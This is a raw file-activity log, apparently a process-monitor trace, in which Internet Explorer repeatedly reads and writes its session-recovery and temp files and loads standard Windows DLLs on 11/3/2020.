11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts\StaticCache.dat
11/3/2020 - 11:45:45.793Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts\StaticCache.datStaticCache.dat
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-core-winrt-string-l1-1-0.dll
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WindowsCodecs.dll
11/3/2020 - 11:45:45.793Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WindowsCodecs.dll
11/3/2020 - 11:45:45.793Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleacc.dll
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleacc.dll
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\OLEACCRC.DLL
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaccrc.dll
11/3/2020 - 11:45:45.793Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaccrc.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ExplorerFrame.dll
11/3/2020 - 11:45:45.809Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ExplorerFrame.dllExplorerFrame.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ExplorerFrame.dll
11/3/2020 - 11:45:45.809Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ExplorerFrame.dllExplorerFrame.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\duser.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\duser.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dui70.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dui70.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dui70.dll
11/3/2020 - 11:45:45.809Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-core-winrt-string-l1-1-0.dll
11/3/2020 - 11:45:45.825Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\MSIMG32.dll
11/3/2020 - 11:45:45.825Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msimg32.dll
11/3/2020 - 11:45:45.825Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msimg32.dll
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.872Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.872Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.872Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\PROPSYS.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:45.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mssprxy.dll
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mssprxy.dll
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\shell32.dll
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\iexplore.exe.Local
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\apphelp.dll
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apphelp.dll
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apphelp.dll
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.965Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.965Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.965Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
